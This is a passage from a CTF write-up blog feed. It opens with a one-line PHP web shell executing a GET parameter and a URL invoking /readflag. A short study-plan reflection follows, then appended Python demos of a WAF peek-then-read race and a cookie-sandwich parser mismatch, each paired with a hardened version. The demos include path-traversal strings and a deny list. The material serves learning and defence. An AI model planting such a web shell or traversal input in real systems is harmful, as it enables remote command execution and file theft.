plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><?=`$_GET[0]`?></span><br></pre></td></tr></table></figure><p>Visit <code>/cmd.php?0=/readflag</code> to get the flag.</p><h1 id="学习计划-1"><a href="#学习计划-1" class="headerlink" title="学习计划"></a>Study plan</h1><p>This is not my first attempt at N1 junior; about two months ago I was bold enough to give it a try, and as expected I could not understand a thing in the write-ups, so I gave up on the spot. Coming back to N1 junior now, I cannot say I solve things at a glance, but I am at least a little stronger than before; these problems were also solved by reading and learning as I went. At the very least I now believe one should perhaps do more problems slightly above one's own level in order to learn more. It reminds me of something my high-school teacher told me, "aim for the top and you reach the middle; aim for the middle and you reach the bottom", and I have come to understand that saying more deeply.</p><p>I have not finished reproducing all of 2024 N1 junior, and there is still a week of exam revision left. After the exams I plan to finish reproducing the N1 problems and then try the XCTF regional-round problems.</p>]]></content>
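The peek-then-read gap from the WAF section above, as an added example that is not the write-up's code: a constructed in-memory stand-in for the socket shows that a filter applied to recv(..., MSG_PEEK) can pass bytes that differ from what the handler's later recv consumes, and a hardened variant that checks exactly the bytes it processes. FakeConn, the FORBIDDEN list and the sample chunks are all constructed here (the challenge's own FORBIDDEN list is not shown on the page).

```python
import socket

# Constructed deny list for the demo; the challenge's own FORBIDDEN list is not on the page.
FORBIDDEN = [b"../", b"/proc/"]
PEEK_LEN = 256

# Constructed traffic: a clean first chunk, then a second chunk that only arrives after
# the filter has already peeked (the timing window a slow request opens up).
CHUNKS = [b"GET /?log=1 HTTP/1.1\r\n", b"/../../../proc/self/maps"]


class FakeConn:
    """Stand-in for a TCP socket: one in-flight chunk 'arrives' per recv() call."""

    def __init__(self, chunks):
        self.pending = list(chunks)  # bytes still on the wire
        self.buf = b""               # bytes sitting in the kernel receive buffer

    def recv(self, n, flags=0):
        if self.pending:
            self.buf += self.pending.pop(0)
        data = self.buf[:n]
        if flags != socket.MSG_PEEK:   # a real read consumes; a peek leaves data in place
            self.buf = self.buf[n:]
        return data


def contains_forbidden(data):
    """Same shape of check as the challenge's filter, over a constructed list."""
    return any(term in data.lower() for term in FORBIDDEN)


def vulnerable_server(conn):
    """Mirrors the challenge: filter the peeked bytes, then handle whatever recv returns."""
    if contains_forbidden(conn.recv(PEEK_LEN, socket.MSG_PEEK)):
        return "403"
    handled = conn.recv(4096)  # by now the second chunk has been appended, unfiltered
    return "handled:" + handled.decode(errors="replace")


def hardened_server(conn):
    """Consume first, then filter the very bytes that will be processed, on every read."""
    outcomes = []
    while True:
        handled = conn.recv(4096)
        if not handled:
            break
        if contains_forbidden(handled):
            outcomes.append("403")
        else:
            outcomes.append("handled:" + handled.decode(errors="replace"))
    return outcomes


if __name__ == "__main__":
    print(vulnerable_server(FakeConn(CHUNKS)))  # the traversal rides in behind the clean prefix
    print(hardened_server(FakeConn(CHUNKS)))    # the late chunk is checked when it is consumed
```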
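The quoting disagreement behind the cookie sandwich described in the intended solution above, as an added example that is not the write-up's code: Python's http.cookies.SimpleCookie stands in for a quote-aware backend parser (the challenge's actual parser is not shown), a naive split-on-semicolon parser stands in for the browser's view of the same header, and is_safe_cookie_value is a constructed guard a /ticket-style endpoint could apply before reflecting a user-supplied value into Set-Cookie. The header and the flag value are constructed.

```python
from http.cookies import SimpleCookie

# Constructed Cookie header in the sandwich shape from the write-up; the flag value is fake.
SANDWICH_HEADER = 'ticket="start; flag=flag{constructed}; aaa=end"'


def naive_parse(header):
    """Browser-style view: split on ';' and keep each key=value pair as it stands."""
    pairs = {}
    for part in header.split(";"):
        if "=" in part:
            key, value = part.strip().split("=", 1)
            pairs[key] = value
    return pairs


def quote_aware_parse(header):
    """Backend view: a value that opens with a double quote runs on to the closing quote,
    so the semicolons inside the quotes become part of the ticket value."""
    jar = SimpleCookie()
    jar.load(header)
    return {key: morsel.value for key, morsel in jar.items()}


def is_safe_cookie_value(value):
    """Constructed guard for a reflecting endpoint: no quotes, separators or control chars,
    so a client-supplied value cannot open or close a quoted run."""
    return all(ch.isprintable() and ch not in '";,\\' for ch in value)


if __name__ == "__main__":
    print(naive_parse(SANDWICH_HEADER))        # three separate pairs
    print(quote_aware_parse(SANDWICH_HEADER))  # one pair swallowing the flag
    print(is_safe_cookie_value('"start'))      # False: would be rejected before Set-Cookie
```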
</entry>
</search>